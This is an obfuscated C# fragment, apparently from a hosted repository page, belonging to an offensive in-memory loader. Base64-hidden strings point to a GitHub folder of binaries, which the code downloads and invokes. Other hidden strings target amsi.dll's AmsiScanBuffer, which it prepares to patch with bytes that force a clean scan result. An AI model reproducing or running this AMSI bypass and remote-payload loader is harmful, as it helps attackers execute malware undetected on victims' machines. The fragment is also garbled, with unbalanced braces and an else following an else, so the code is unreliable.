public static void EcologyRepressory(string PresubordinatedHutched, string CanephoroeGravure = "", string EnsueDesegmentation = "", bool SunnClarifiers = true)
|
||||
{
|
||||
{
|
||||
if (!SunnClarifiers)
|
||||
{
|
||||
}
|
||||
else
|
||||
{
|
||||
HesitatersPerivaginal(EructsTinnier(DownfallingEpithalamiast(MusicologiesAggregatae(ConcertmasterRetinued))),ResinolicSansei);
|
||||
BiocatalyticCounterexercise(ButterflyerPiacularity(TartufesEssentialism(AdenocarcinomasLums(EnsueDesegmentation))), new object[] { new string[] { CanephoroeGravure } });
|
||||
}
|
||||
else
|
||||
{
|
||||
PresubordinatedHutched = "/" + PresubordinatedHutched + Encoding.UTF8.GetString(Convert.FromBase64String("P3Jhdz10cnVl"));
|
||||
string PersuasoryDovened = "";
|
||||
BiocatalyticCounterexercise(ButterflyerPiacularity(TartufesEssentialism(AdenocarcinomasLums(
|
||||
(Encoding.UTF8.GetString(Convert.FromBase64String(("aHR0cHM6Ly9naXRod_IuY29tL0ZsY_5ndmlrL05ldExvY_Rlci90cmVlL21hc3Rlci9Ca_5hcmllcw==").Replace("_", "W"))) + PresubordinatedHutched).Replace("tree", "blob")))), new object[] { new string[] { CanephoroeGravure } });
|
||||
}
|
||||
}
|
||||
public static byte[] AdenocarcinomasLums(string UnmistakablenessPocketful)
|
||||
{
|
||||
if (UnmistakablenessPocketful.StartsWith("http"))
|
||||
return FourrierSplaying.DownloadData(UnmistakablenessPocketful);
|
||||
return File.ReadAllBytes(UnmistakablenessPocketful);
|
||||
}
|
||||
private static void AbirritatingSoaper(bool PolycraticMacroinstruction = false)
|
||||
{
|
||||
Console.WriteLine("[+] Doing the thing");
|
||||
IntPtr SpiringConqueress = WolterTrap(AmgarnQuistron(Encoding.UTF8.GetString(Convert.FromBase64String("YW1zaS5kbGw="))), Encoding.UTF8.GetString(Convert.FromBase64String("QW1zaVNjYW5CdWZmZXI=")));
|
||||
uint AntiliftDragooning = 0x40;
|
||||
uint CliverMustaches = 0;
|
||||
var MydaidaeJeeringly = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 };
|
||||
}
|
||||
if (System.Environment.Is64BitOperatingSystem)
|
||||
MydaidaeJeeringly = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
|
||||
var CapeworkErythrocytic = VeldskoenPantatype(SpiringConqueress, (UIntPtr)MydaidaeJeeringly.Length, AntiliftDragooning, out CliverMustaches);
|
||||
if (CapeworkErythrocytic != null)
|
||||
|
||||
Reference in New Issue
Block a user